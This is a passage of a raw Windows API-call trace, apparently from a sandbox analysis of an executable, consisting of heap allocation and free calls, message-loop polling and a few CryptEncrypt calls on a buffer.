1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0171.328] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2798, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2798*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.330] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 1 [0171.330] TranslateMessage (lpMsg=0x87e924) returned 0 [0171.330] DispatchMessageW (lpMsg=0x87e924) returned 0x0 [0171.330] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87dfc0) returned 1 [0171.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.332] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0171.332] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0171.332] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.332] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0171.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.333] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.333] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.333] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.334] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.334] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8f0a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8f10) returned 1 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0171.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0171.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0171.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.335] CharLowerBuffW (in: lpsz="byte[36625]", cchLength=0xb | out: lpsz="byte[36625]") returned 0xb [0171.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0171.336] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.337] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.337] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0171.337] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0171.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.338] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa67f20*, pdwDataLen=0x87e820*=0x8f0a, dwBufLen=0x8f10 | out: pbData=0xa67f20*, pdwDataLen=0x87e820*=0x8f10) returned 1 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0171.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0171.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0171.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0171.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0171.339] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.340] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.340] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.340] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.340] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.340] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.340] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 